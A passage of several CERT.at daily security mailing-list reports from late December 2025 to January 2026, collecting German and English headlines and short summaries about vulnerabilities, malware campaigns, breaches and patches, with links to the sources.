---------------------------------------------
https://thehackernews.com/2026/01/trend-micro-apex-central-rce-flaw.html
∗∗∗ Mediaplayer VLC: Aktualisierte Version stopft zahlreiche Lücken ∗∗∗
---------------------------------------------
Die Version 3.0.23 des VLC Media Player bessert diverse Schwachstellen aus, die möglicherweise Unterschieben von Schadcode erlauben.
---------------------------------------------
https://www.heise.de/news/VLC-stopft-diverse-Sicherheitslecks-11135921.html
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (pdfminer and vlc), Red Hat (kernel, kernel-rt, and microcode_ctl), Slackware (libtasn1), SUSE (apptainer, curl, ImageMagick, libpcap, libvirt, libwget4, php8, podman, python311-cbor2, qemu, and rsync), and Ubuntu (gnupg, gnupg2, gpsd, libsodium, and python-tornado).
---------------------------------------------
https://lwn.net/Articles/1053492/
∗∗∗ Hitachi Energy Asset Suite ∗∗∗
---------------------------------------------
Hitachi Energy is aware of a Jasper Report vulnerability that affects the Asset Suite product versions mentioned in this document below. This vulnerability can be exploited to carry out remote code execution (RCE) attack on the product. Please refer to the Recommended Immediate Actions for information about the mitigation/remediation.
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-26-008-01
∗∗∗ K000159018: Linux kernel vulnerability CVE-2023-53178 ∗∗∗
---------------------------------------------
A local unprivileged user may exploit this vulnerability and cause data integrity issues or system instability under specific conditions.
---------------------------------------------
https://my.f5.com/manage/s/article/K000159018
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/
=====================
= End-of-Day report =
=====================
Timeframe: Mittwoch 07-01-2026 18:00 − Donnerstag 08-01-2026 18:00
Handler: Felician Fuchs
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ New GoBruteforcer attack wave targets crypto, blockchain projects ∗∗∗
---------------------------------------------
A new wave of GoBruteforcer botnet malware attacks is targeting databases of cryptocurrency and blockchain projects on exposed servers believed to be configured using AI-generated examples.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-gobruteforcer-attack-wav…
∗∗∗ Cisco warns of Identity Service Engine flaw with exploit code ∗∗∗
---------------------------------------------
Cisco has patched an ISE vulnerability with public proof-of-concept exploit code that can be abused by attackers with admin privileges.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/cisco-warns-of-identity-serv…
∗∗∗ Dringend MFA aktivieren: Massenhaft Daten aus Cloud-Instanzen abgeflossen ∗∗∗
---------------------------------------------
Betroffen sind self-hosted Instanzen von Owncloud, Nextcloud und Sharefile. Daten von 50 Organisationen stehen zum Verkauf, weil die MFA nicht aktiv war.
---------------------------------------------
https://www.golem.de/news/dringend-mfa-aktivieren-massenhaft-daten-aus-clou…
∗∗∗ NIS-2-Umsetzung: BSI schaltet Meldeportal auf Amazon-Servern frei ∗∗∗
---------------------------------------------
Fast 30.000 Firmen und Behörden der kritischen Infrastruktur müssen sich beim BSI registrieren. Das Portal läuft auf Clouddiensten von AWS.
---------------------------------------------
https://www.golem.de/news/nis-2-umsetzung-bsi-schaltet-meldeportal-auf-amaz…
∗∗∗ BSI warnt: 40 Prozent der deutschen Zimbra-Server sind angreifbar ∗∗∗
---------------------------------------------
Ein Großteil aller Zimbra-Server in Deutschland basiert noch auf einer veralteten Version, die anfällig für gefährliche Sicherheitslücken ist.
---------------------------------------------
https://www.golem.de/news/bsi-warnt-40-prozent-der-deutschen-zimbra-server-…
∗∗∗ Fake Browser Updates Targeting WordPress Administrators via Malicious Plugin ∗∗∗
---------------------------------------------
We recently investigated a case involving a WordPress website where a customer reported persistent fake pop-up notifications appearing on their site. The warnings were urging them to update their browser (Chrome or Firefox), even though their software was already fully up-to-date.
---------------------------------------------
https://blog.sucuri.net/2026/01/fake-browser-updates-targeting-wordpress-ad…
∗∗∗ CISA Flags Microsoft Office and HPE OneView Bugs as Actively Exploited ∗∗∗
---------------------------------------------
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added two security flaws impacting Microsoft Office and Hewlett Packard Enterprise (HPE) OneView to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
---------------------------------------------
https://thehackernews.com/2026/01/cisa-flags-microsoft-office-and-hpe.html
∗∗∗ Researchers Uncover NodeCordRAT Hidden in npm Bitcoin-Themed Packages ∗∗∗
---------------------------------------------
Cybersecurity researchers have discovered three malicious npm packages that are designed to deliver a previously undocumented malware called NodeCordRAT.
---------------------------------------------
https://thehackernews.com/2026/01/researchers-uncover-nodecordrat-hidden.ht…
∗∗∗ IBMs AI agent Bob easily duped to run malware, researchers show ∗∗∗
---------------------------------------------
Prompt injection lets risky commands slip past guardrails IBM describes its coding agent thus: "Bob is your AI software development partner that understands your intent, repo, and security standards." Unfortunately, Bob doesnt always follow those security standards.
---------------------------------------------
https://www.theregister.com/2026/01/07/ibm_bob_vulnerability/
∗∗∗ Gemeinsam gegen Cyber-Kriminalität: Info-Offensive zum ESC-Ticketkauf ∗∗∗
---------------------------------------------
Vor dem Start der ersten Ticket-Verkaufswelle am 13. Jänner sensibilisieren ORF, EBU, BMI, Stadt Wien, Polizei und „Watchlist Internet“ für Cyber-Gefahren und richten eine zentrale Meldestelle für Betrugsversuche ein.
---------------------------------------------
https://www.watchlist-internet.at/news/gemeinsam-gegen-cyber-kriminalitaet-…
∗∗∗ Stalkerware operator pleads guilty in rare prosecution ∗∗∗
---------------------------------------------
The owner of a Michigan-based stalkerware company pleaded guilty to federal charges for selling a product designed to spy on people without their consent.
---------------------------------------------
https://therecord.media/stalkerware-guilty-plea-fleming
∗∗∗ Fake ChatGPT and DeepSeek Extensions Spied on Over 1 Million Chrome Users ∗∗∗
---------------------------------------------
Security researchers have identified two malicious Chrome extensions recording AI chats. Learn how to identify and remove these tools to protect your privacy.
---------------------------------------------
https://hackread.com/fake-chatgpt-deepseek-extensions-spy-chrome-users/
∗∗∗ Discord Controlled NodeCordRAT Steals Chrome Data via NPM Packages ∗∗∗
---------------------------------------------
Zscaler ThreatLabz identifies three malicious NPM packages mimicking Bitcoin libraries. The NodeCordRAT virus uses Discord commands to exfiltrate MetaMask data and Chrome passwords.
---------------------------------------------
https://hackread.com/discord-nodecordrat-steal-chrome-data-npm-packages/
∗∗∗ The Ransomware Ground Game: How A Christmas Scanning Campaign Will Fuel 2026 Attacks ∗∗∗
---------------------------------------------
Over four days in December, one operator scanned the internet with 240+ exploits, logging confirmed vulnerabilities that could power targeted intrusions in 2026.
---------------------------------------------
https://www.greynoise.io/blog/christmas-scanning-campaign-fuel-2026-attacks
∗∗∗ Decoding the GitHub recommendations for npm maintainers ∗∗∗
---------------------------------------------
This blog post explores the rationale and implementation behind GitHubs security recommendations for npm maintainers following numerous high-profile supply-chain incidents. It details how hardening publishing infrastructure through trusted publishing, enforced two-factor authentication, and WebAuthn-based protocols can meaningfully increase the resilience of the ecosystem.
---------------------------------------------
https://securitylabs.datadoghq.com/articles/decoding-the-recommendations-fo…
∗∗∗ Abusing ROPC to Bypass MFA — and How I Built a Detection for It in Microsoft Sentinel ∗∗∗
---------------------------------------------
Among all the OAuth2 grant types available in Azure AD (now Microsoft Entra ID), the Resource Owner Password Credential (ROPC) flow remains one of the most misunderstood — and most abused.
---------------------------------------------
https://detect.fyi/abusing-ropc-to-bypass-mfa-and-how-i-built-a-detection-f…
∗∗∗ Preparing for Post-Quantum Cryptography ∗∗∗
---------------------------------------------
Learn what you can do today to prepare for Q-Day.
---------------------------------------------
https://www.wiz.io/blog/preparing-for-post-quantum-cryptography
∗∗∗ npm to Implement Staged Publishing After Turbulent Shift Off Classic Tokens ∗∗∗
---------------------------------------------
The JavaScript ecosystem spent much of 2025 responding to a sustained run of supply chain attacks, but it was the multi-wave Shai-Hulud campaign that ultimately reset expectations for what large-scale, automated compromise looks like. By the end of the year, organizations with JavaScript-heavy infrastructure were no longer treating supply chain malware as an edge case, but as an operational risk that could spread faster than human review. Now, npm says it is preparing its next major response.
---------------------------------------------
https://socket.dev/blog/npm-to-implement-staged-publishing
∗∗∗ Crimson Collective Claims to Disconnect Brightspeed Internet Users After Hack ∗∗∗
---------------------------------------------
The hacking group Crimson Collective claims to have access to Brightspeed’s infrastructure and is disconnecting users from the company’s home internet services. The group made its latest claims in a post on Telegram yesterday. “Hey BrightSpeed, we disconnected alot of your users home internet.. they might be complaining you should check,” the Telegram post says.
---------------------------------------------
https://thecyberexpress.com/crimson-collective-disconnects-brightspeed/
∗∗∗ Trump Orders US Exit from Global Cyber and Hybrid Threat Coalitions ∗∗∗
---------------------------------------------
President Donald Trump has ordered the immediate withdrawal of the United States from several premier international bodies dedicated to cybersecurity, digital human rights, and countering hybrid warfare, as part of a major restructuring of American defense and diplomatic posture.
---------------------------------------------
https://thecyberexpress.com/trump-orders-us-exit-from-cyber-coalitions/
∗∗∗ UK Moves to Close Public Sector Cyber Gaps With Government Cyber Action Plan ∗∗∗
---------------------------------------------
The UK government has revealed the Government Cyber Action Plan as a renewed effort to close the growing gap between escalating cyber threats and the public sector’s ability to respond effectively. The move comes amid a series of cyberattacks targeting UK retail and manufacturing sectors, incidents that have underscored broader vulnerabilities affecting critical services and government operations.
---------------------------------------------
https://thecyberexpress.com/uk-government-cyber-action-plan/
=====================
= Vulnerabilities =
=====================
∗∗∗ Max severity Ni8mare flaw lets hackers hijack n8n servers ∗∗∗
---------------------------------------------
A maximum severity vulnerability dubbed "Ni8mare" allows remote, unauthenticated attackers to take control over locally deployed instances of the N8N workflow automation platform.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/max-severity-ni8mare-flaw-le…
∗∗∗ Critical jsPDF flaw lets hackers steal secrets via generated PDFs ∗∗∗
---------------------------------------------
The jsPDF library for generating PDF documents in JavaScript applications is vulnerable to a critical vulnerability that allows an attacker to steal sensitive data from the local filesystem by including it in generated files.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/critical-jspdf-flaw-lets-hac…
∗∗∗ The installers for multiple PIONEER products may insecurely load Dynamic Link Libraries ∗∗∗
---------------------------------------------
The installers for multiple products provided by PIONEER CORPORATION may insecurely load Dynamic Link Libraries. Arbitrary code may be executed with the privileges of the running installer.
---------------------------------------------
https://jvn.jp/en/jp/JVN17956874/
∗∗∗ zlib: Kritische Sicherheitslücke ermöglicht Codeschmuggel – noch kein Update ∗∗∗
---------------------------------------------
In einem Werkzeug der Kompressionsbibliothek zlib, die in zahlreichen Programmen und Betriebssystemen enthalten ist, haben IT-Forscher eine kritische Sicherheitslücke entdeckt. Sie ermöglicht unter Umständen das Einschleusen und Ausführen von Schadcode. Ein Update zum Stopfen des Sicherheitslecks gibt es bislang noch nicht.
---------------------------------------------
https://www.heise.de/news/zlib-Kritische-Sicherheitsluecke-ermoeglicht-Code…
∗∗∗ Sieben kritische Sicherheitslücken mit Höchstwertung bedrohen Coolify ∗∗∗
---------------------------------------------
Admins von Platform-as-a-Service-Umgebungen auf der Basis von Coolify sollten ihre Instanzen zügig auf den aktuellen Stand bringen. Geschieht das nicht, können Angreifer unter anderem an sieben „kritischen“ Sicherheitslücken mit Höchstwertung (CVSS Score 10 von 10) ansetzen, um Server vollständig zu kompromittieren.
---------------------------------------------
https://www.heise.de/news/Sieben-kritische-Sicherheitsluecken-mit-Hoechstwe…
∗∗∗ Kanboard-Sicherheitslücke ermöglicht Anmeldung als beliebiger User ∗∗∗
---------------------------------------------
Das Open-Source-Kanban Kanboard ist von drei Schwachstellen betroffen. Eine davon gilt den Entwicklern als kritisches Risiko und ermöglicht die Anmeldung als beliebiger User – sofern eine bestimmte Konfigurationsoption gesetzt ist.
---------------------------------------------
https://www.heise.de/news/Kanboard-Sicherheitsluecke-ermoeglicht-Anmeldung-…
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (gcc-toolset-14-binutils, gcc-toolset-15-binutils, httpd, kernel, libpng, mariadb, mingw-libpng, poppler, python3.12, and ruby:3.3), Debian (foomuuri and libsodium), Fedora (python-pdfminer and wget2), Oracle (audiofile, bind, gcc-toolset-15-binutils, libpng, mariadb, mariadb10.11, mariadb:10.11, mariadb:10.5, mingw-libpng, poppler, and python3.12), Red Hat (git-lfs, kernel, libpng, libpq, mariadb:10.3, osbuild-composer, postgresql, postgresql:13, and postgresql:15), Slackware (curl), SUSE (c-ares-devel, capstone, curl, gpsd, ImageMagick, libpcap, log4j, python311-filelock, and python314), and Ubuntu (libcaca, libxslt, and net-snmp).
---------------------------------------------
https://lwn.net/Articles/1053277/
∗∗∗ [R1] Nessus Agent Versions 11.0.3 and 10.9.3 Fix One Vulnerability ∗∗∗
---------------------------------------------
A vulnerability has been identified in the installation/uninstallation of the Nessus Agent Tray App on Windows Hosts which could lead to escalation of privileges. Tenable has released Nessus Agent 11.0.3 and Nessus Agent 10.9.3 to address these issues.
---------------------------------------------
https://www.tenable.com/security/tns-2026-01
∗∗∗ CVE-2025-42877: Memory Corruption in SAP Web Dispatcher ∗∗∗
---------------------------------------------
SAP Web Dispatcher and Internet Communication Manager (ICM) contain a critical memory corruption vulnerability in the HTTP header parsing function. The vulnerability allows an unauthenticated attacker to cause heap corruption and lead to Denial of Service through specially crafted HTTP requests.
---------------------------------------------
https://redrays.io/blog/cve-2025-42877-sap-web-dispatcher-memory-corruption…
∗∗∗ Case opened: DIVD-2025-00011 - Severe vulnerabilities in Growatt portal ∗∗∗
---------------------------------------------
https://csirt.divd.nl/cases/DIVD-2025-00011/
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/
=====================
= End-of-Day report =
=====================
Timeframe: Montag 05-01-2026 18:00 − Mittwoch 07-01-2026 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ New D-Link flaw in legacy DSL routers actively exploited in attacks ∗∗∗
---------------------------------------------
Threat actors are exploiting a recently discovered command injection vulnerability that affects multiple D-Link DSL gateway routers that went out of support years ago.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-d-link-flaw-in-legacy-ds…
∗∗∗ ownCloud urges users to enable MFA after credential theft reports ∗∗∗
---------------------------------------------
File-sharing platform ownCloud warned users today to enable multi-factor authentication (MFA) to block attackers using compromised credentials from stealing their data.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/owncloud-urges-users-to-enab…
∗∗∗ Microsoft: Classic Outlook bug prevents opening encrypted emails ∗∗∗
---------------------------------------------
Microsoft has confirmed a known issue that prevents recipients from opening encrypted emails in classic Outlook.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/microsoft-classic-outlook-b…
∗∗∗ Founder of Spyware Maker PcTattletale Pleads Guilty To Hacking, Advertising Surveillance Software ∗∗∗
---------------------------------------------
An anonymous reader quotes a report from TechCrunch: The founder of a U.S.-based spyware company, whose surveillance products allowed customers to spy on the phones and computers of unsuspecting victims, pleaded guilty to federal charges linked to his long-running operation. pcTattletale founder Bryan Fleming entered a guilty plea in a San Diego federal ..
---------------------------------------------
https://yro.slashdot.org/story/26/01/07/0033238/founder-of-spyware-maker-pc…
∗∗∗ UK injects just £210M into cyber plan to stop Whitehall getting pwnd ∗∗∗
---------------------------------------------
Central government will supposedly be as secure as energy facilities and datacenters under new proposals The UK today launches its Government Cyber Action Plan, committing £210 million ($282 million) to strengthen defenses across digital public services and hold itself to the same cybersecurity standards its imposing on critical infrastructure operators.
---------------------------------------------
https://www.theregister.com/2026/01/06/government_cyber_action_plan/
∗∗∗ Malicious NPM Packages Deliver NodeCordRAT ∗∗∗
---------------------------------------------
Zscaler ThreatLabz regularly monitors the npm database for suspicious packages. In November 2025, ThreatLabz identified three malicious packages: bitcoin-main-lib, bitcoin-lib-js, and bip40. The bitcoin-main-lib and bitcoin-lib-js packages execute a postinstall.cjs script during installation, which installs bip40, the package that contains the ..
---------------------------------------------
https://www.zscaler.com/blogs/security-research/malicious-npm-packages-deli…
∗∗∗ CISA-Katalog attackierter Schwachstellen wuchs 2025 um 20 Prozent ∗∗∗
---------------------------------------------
Die US-amerikanische IT-Sicherheitsbehörde CISA pflegt einen Katalog angegriffener Schwachstellen. Der wuchs 2025 etwas schneller.
---------------------------------------------
https://www.heise.de/news/CISA-Katalog-attackierter-Schwachstellen-wuchs-20…
∗∗∗ Patchday: Dolby-Digital-Sicherheitslücke in Android geschlossen ∗∗∗
---------------------------------------------
Androidgeräte sind für eine Zero-Click-Attacke anfällig. Dieses Sicherheitsproblem wurde nun gelöst.
---------------------------------------------
https://www.heise.de/news/Patchday-Dolby-Digital-Sicherheitsluecke-in-Andro…
∗∗∗ Ubiquiti UniFi Protect: Sicherheitslücke ermöglicht Zugriff auf Kameras ∗∗∗
---------------------------------------------
In der UniFi Protect Application können Angreifer Schwachstellen für unbefugten Zugriff auf Kameras und DoS-Attacken missbrauchen.
---------------------------------------------
https://www.heise.de/news/Ubiquiti-UniFi-Protect-Sicherheitsluecke-ermoegli…
∗∗∗ Mehrere Sicherheitslücken bedrohen Veeam Back & Replication ∗∗∗
---------------------------------------------
Ein wichtiges Sicherheitsupdate schließt mehrere Schwachstellen in Veeam Back & Replication. Bislang sind keine Attacken bekannt.
---------------------------------------------
https://www.heise.de/news/Mehrere-Sicherheitsluecken-bedrohen-Veeam-Back-Re…
∗∗∗ Krypto-Phishing mit angeblicher Mail des Bundeszentralamts für Steuern ∗∗∗
---------------------------------------------
Eine aktuelle Phishing-Welle behauptet Abweichungen bei „Krypto-Angaben“ beim Bundeszentralamt für Steuern.
---------------------------------------------
https://www.heise.de/news/Krypto-Phishing-mit-angeblicher-Mail-des-Bundesze…
∗∗∗ 2025, the year of the Infostealer ∗∗∗
---------------------------------------------
TL;DR Introduction Infostealers are not new malware. They have been around for decades. What has changed is how effective they have become, and how easily they blend into normal user behaviour. In 2025, infostealers became the fastest growing malware category, overtaking ransomware in terms of deployment and spread. The H1 2025 reports highlighted a sharp rise in simple ..
---------------------------------------------
https://www.pentestpartners.com/security-blog/2025-the-year-of-the-infostea…
∗∗∗ Russian hackers target European hospitality industry with ‘blue screen of death’ malware ∗∗∗
---------------------------------------------
The scheme starts with a fake reservation cancellation that impersonates a popular booking site, and eventually prompts victims with an error message and “Blue Screen of Death” page.
---------------------------------------------
https://therecord.media/russian-hackers-europe-hospitality-blue-screen
∗∗∗ Alleged cyber scam kingpin arrested, extradited to China ∗∗∗
---------------------------------------------
Chen Zhi’s arrest is the latest chapter in the remarkable downfall of one of the country’s most prominent businesses, with holdings in the real estate, banking, entertainment and airline industries.
---------------------------------------------
https://therecord.media/alleged-cyber-scam-kingpin-cambodia-arrested-extrad…
∗∗∗ Analysis of a Fake Cloudflare Turnstile Used as a Traffic Filtering Gate ∗∗∗
---------------------------------------------
During analysis of a phishing URL chain, I observed a fake Cloudflare Turnstile verification page acting as an intelligent traffic filtering gate. Rather than protecting a website, this page selectively blocks, redirects, or allows access based on geolocation, proxy usage, and browser fingerprinting. This phishing infrastructure demonstrates Traffic Distribution System like behavior ..
---------------------------------------------
https://malwr-analysis.com/2026/01/07/analysis-of-a-fake-cloudflare-turnsti…
=====================
= Vulnerabilities =
=====================
∗∗∗ Cisco Identity Services Engine XML External Entity Processing Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
A vulnerability in the licensing features of Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker with administrative privileges to gain access to sensitive information. This vulnerability is due to improper parsing of XML that is processed by the web-based management interface of Cisco ISE and Cisco ISE-PIC. An attacker could exploit this vulnerability by uploading a malicious file to ..
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities ∗∗∗
---------------------------------------------
Multiple Cisco products are affected by vulnerabilities in the processing of Distributed Computing Environment Remote Procedure Call (DCE/RPC) requests that could allow an unauthenticated, remote attacker to cause the Snort 3 Detection Engine to leak sensitive information or to restart, which would result in an interruption of packet inspection. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address ..
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ [20260101] - Core - Inadequate content filtering for data URLs ∗∗∗
---------------------------------------------
https://developer.joomla.org/security-centre/1016-20260101-core-inadequate-…
∗∗∗ [20260102] - Core - XSS vector in the pagebreak plugin ∗∗∗
---------------------------------------------
https://developer.joomla.org/security-centre/1017-20260102-core-xss-vector-…
∗∗∗ [20260102] - Core - XSS vectors in the pagebreak and pagenavigation plugins ∗∗∗
---------------------------------------------
https://developer.joomla.org/security-centre/1017-20260102-core-xss-vector-…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/
=====================
= End-of-Day report =
=====================
Timeframe: Freitag 02-01-2026 18:00 − Montag 05-01-2026 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Hackers claim to hack Resecurity, firm says it was a honeypot ∗∗∗
---------------------------------------------
The ShinyHunters hacking group claims it breached the systems of cybersecurity firm Resecurity and stole internal data, while Resecurity says the attackers only accessed a deliberately deployed honeypot containing fake information used to monitor their activity.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-claim-resecurity-hac…
∗∗∗ How to Protect Your iPhone or Android Device From Spyware ∗∗∗
---------------------------------------------
Being targeted by sophisticated spyware is relatively rare, but experts say that everyone needs to stay vigilant as this dangerous malware continues to proliferate worldwide.
---------------------------------------------
https://www.wired.com/story/how-to-protect-your-iphone-or-android-device-fr…
∗∗∗ Plex Media Server: Noch ungepatchte Zugriffsschwachstellen ∗∗∗
---------------------------------------------
Im Plex Media Server klaffen Sicherheitslecks, durch die Angreifer sich unbefugt Zugriff verschaffen können. Updates stehen aus.
---------------------------------------------
https://www.heise.de/news/Plex-Media-Server-Noch-ungepatchte-Zugriffsschwac…
∗∗∗ MongoBleed-Scanner für Admins ∗∗∗
---------------------------------------------
Viele MongoDB-Instanzen sind oder waren potenziell für MongoBleed anfällig. Ein Tool hilft bei der Server-Analyse auf Angriffsspuren.
---------------------------------------------
https://www.heise.de/news/MongoBleed-Scanner-fuer-Admins-11129291.html
∗∗∗ Taiwan: 2,6 Millionen Cyberangriffe Chinas pro Tag ∗∗∗
---------------------------------------------
Die Angriffe haben laut Taiwan in zeitlicher Nähe zu Militärübungen stattgefunden. China dementiert
---------------------------------------------
https://www.derstandard.at/story/3000000302832/taiwan-26-millionen-cyberang…
∗∗∗ Aktuelle Angriffe gegen alte Sicherheitslücke in Fortinet-Geräten (CVE-2020-12812) ∗∗∗
---------------------------------------------
Eine bereits seit Juli 2020 bekannte Sicherheitslücke in Fortinet-Firewalls, CVE-2020-12812, wird aktuell aktiv ausgenutzt. Durch Ausnutzung der Schwachstelle können Angreifer:innen durch eine simple Manipulation von Groß- und Kleinbuchstaben in Benutzernamen (z. B. "Mmueller" statt "mmueller") die Zwei-Faktor-Authentifizierung (2FA) über Fortitoken umgehen. Besonders gefährdet sind Systeme, die lokale Nutzer:innen über einen ..
---------------------------------------------
https://www.cert.at/de/aktuelles/2026/1/aktuelle-angriffe-gegen-alte-sicher…
∗∗∗ Nearly 480,000 impacted by Covenant Health data breach ∗∗∗
---------------------------------------------
A cyberattack last year against the Catholic healthcare organization Covenant Health exposed the sensitive information of more than 478,000 people.
---------------------------------------------
https://therecord.media/covenant-health-breach-qilin
∗∗∗ NordVPN Denies Breach After Hacker Claims Access to Salesforce Dev Data ∗∗∗
---------------------------------------------
A hacker using the alias 1011 has claimed to breach a NordVPN development server, posting what appears to…
---------------------------------------------
https://hackread.com/nordvpn-denies-breach-hacker-salesforce-dev-data/
∗∗∗ Schlappe für Softwarebauer: BSI darf Sicherheitskonzept als „auffällig“ rügen ∗∗∗
---------------------------------------------
Das Verwaltungsgericht Köln hat den Eilantrag eines Herstellers gegen eine drohende behördliche Warnung abgewiesen und die BSI-Informationsbefugnisse gestärkt.
---------------------------------------------
https://heise.de/-11127661
∗∗∗ Sicherheitsupdates: Verschiedene Attacken auf Qnap-NAS möglich ∗∗∗
---------------------------------------------
Stimmten die Voraussetzungen, können Angreifer Netzwerkspeicher von Qnap mit weitreichenden Folgen attackieren.
---------------------------------------------
https://heise.de/-11129647
∗∗∗ The Kimwolf Botnet is Stalking Your Local Network ∗∗∗
---------------------------------------------
The story you are reading is a series of scoops nestled inside a far more urgent Internet-wide security advisory. The vulnerability at issue has been exploited for months already, and it’s time for a broader awareness of the threat. The short version is that everything you thought you knew about the security of the internal network behind your Internet router probably is now dangerously out of date.
---------------------------------------------
https://krebsonsecurity.com/2026/01/the-kimwolf-botnet-is-stalking-your-loc…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (tar), Debian (curl and gimp), Fedora (doctl, gitleaks, gnupg2, grpcurl, nginx, nginx-mod-brotli, nginx-mod-fancyindex, nginx-mod-headers-more, nginx-mod-modsecurity, nginx-mod-naxsi, nginx-mod-vts, and usd), Mageia (cups), Red Hat (container-tools:rhel8, go-toolset:rhel8, grafana, and skopeo), and SUSE (dirmngr, fluidsynth, gnu-recutils, libmatio-devel, python311-marshmallow, python312-Django6, rsync, and thunderbird).
---------------------------------------------
https://lwn.net/Articles/1052795/
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/
=====================
= End-of-Day report =
=====================
Timeframe: Dienstag 30-12-2025 18:00 − Freitag 02-01-2026 18:00
Handler: Michael Schlagenhaufer
Co-Handler: Alexander Riepl
=====================
= News =
=====================
∗∗∗ Over 10K Fortinet firewalls exposed to actively exploited 2FA bypass ∗∗∗
---------------------------------------------
Fortinet released FortiOS versions 6.4.1, 6.2.4, and 6.0.10 in July 2020 to address this flaw (tracked as CVE-2020-12812) and advised admins who couldn't immediately patch to turn off username-case-sensitivity to block 2FA bypass attempts targeting their devices. [..] On Friday, Internet security watchdog Shadowserver revealed that it currently tracks over 10,000 Fortinet firewalls still exposed on the Internet that are unpatched against CVE-2020-12812 and vulnerable to these ongoing attacks ...
---------------------------------------------
https://www.bleepingcomputer.com/news/security/over-10-000-fortinet-firewal…
∗∗∗ The Kimwolf Botnet is Stalking Your Local Network ∗∗∗
---------------------------------------------
The story you are reading is a series of scoops nestled inside a far more urgent Internet-wide security advisory. The vulnerability at issue has been exploited for months already, and its time for a broader awareness of the threat. The short version is that everything you thought you knew about the security of the internal network behind your Internet router probably is now dangerously out of date.
---------------------------------------------
https://krebsonsecurity.com/2026/01/the-kimwolf-botnet-is-stalking-your-loc…
∗∗∗ Everest Ransomware Leaks 1TB of Stolen ASUS Data ∗∗∗
---------------------------------------------
On December 2, 2025, Hackread.com exclusively reported that the Everest ransomware group claimed to have stolen 1TB of sensitive ASUS data, including information related to the company’s AI models, memory dumps, and calibration files. [..] Everest has now leaked the entire dataset online.
---------------------------------------------
https://hackread.com/everest-ransomware-asus-data-leak/
∗∗∗ RondoDox botnet exploits React2Shell flaw to breach Next.js servers ∗∗∗
---------------------------------------------
The RondoDox botnet has been observed exploiting the critical React2Shell flaw (CVE-2025-55182) to infect vulnerable Next.js servers with malware and cryptominers.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/rondodox-botnet-exploits-rea…
∗∗∗ The biggest cybersecurity and cyberattack stories of 2025 ∗∗∗
---------------------------------------------
2025 was a big year for cybersecurity, with cyberattacks, data breaches, threat groups reaching new notoriety levels, and, of course, zero-day flaws exploited in breaches. Some stories, though, were more impactful or popular with our readers than others. This article explores 15 of the biggest cybersecurity stories of 2025.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/the-biggest-cybersecurity-an…
∗∗∗ Hong Kong’s newest anti-scam technology is over-the-counter banking ∗∗∗
---------------------------------------------
Hong Kong’s banks have a new weapon against scams: Accounts that require customers to visit a branch to access their funds.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2025/12/31/hong_kong_an…
∗∗∗ How AI made scams more convincing in 2025 ∗∗∗
---------------------------------------------
Several AI-related stories in 2025 highlighted how quickly AI systems can move beyond meaningful human control.
---------------------------------------------
https://www.malwarebytes.com/blog/news/2026/01/how-ai-made-scams-more-convi…
∗∗∗ VVS Discord Stealer Using Pyarmor for Obfuscation and Detection Evasion ∗∗∗
---------------------------------------------
Discord is a social messaging and communications platform that has become a popular target for malware, like VVS stealer. VVS stealer is designed to steal a victim's Discord information and browser data. [..] The stealer also achieves persistence by automatically installing itself on startup. It operates stealthily by displaying fake error messages and capturing screenshots.
---------------------------------------------
https://unit42.paloaltonetworks.com/vvs-stealer/
∗∗∗ Snipping the Long Tail of Shai-Hulud 2.0 ∗∗∗
---------------------------------------------
Wiz Research reveals the data behind Shai-Huluds 2.0 long tail, the massive gap in cloud credential rotation, a potential link to the Trust Wallet incident, and how we finally "snipped the tail" on a month of ongoing infections.
---------------------------------------------
https://www.wiz.io/blog/snipping-the-long-tail-of-shai-hulud-2-0
∗∗∗ RMM Abuse in a Crypto Wallet Distribution Campaign ∗∗∗
---------------------------------------------
A professionally written announcement email titled “Eternl Desktop Is Live — Secure Execution for Atrium & Diffusion Participants” is currently circulating within the Cardano community. [..] This campaign exhibits multiple overlapping indicators consistent with supply-chain abuse and trojanized wallet distribution, combined with pre positioning techniques that leverage RMM tools to establish persistent access.
---------------------------------------------
https://malwr-analysis.com/2025/12/31/rmm-abuse-in-a-crypto-wallet-distribu…
=====================
= Vulnerabilities =
=====================
∗∗∗ Gambio: Wichtiges Security Update 2025-12 v1.0.0 für alle Versionen bis GX5 v5.0.1.0 ∗∗∗
---------------------------------------------
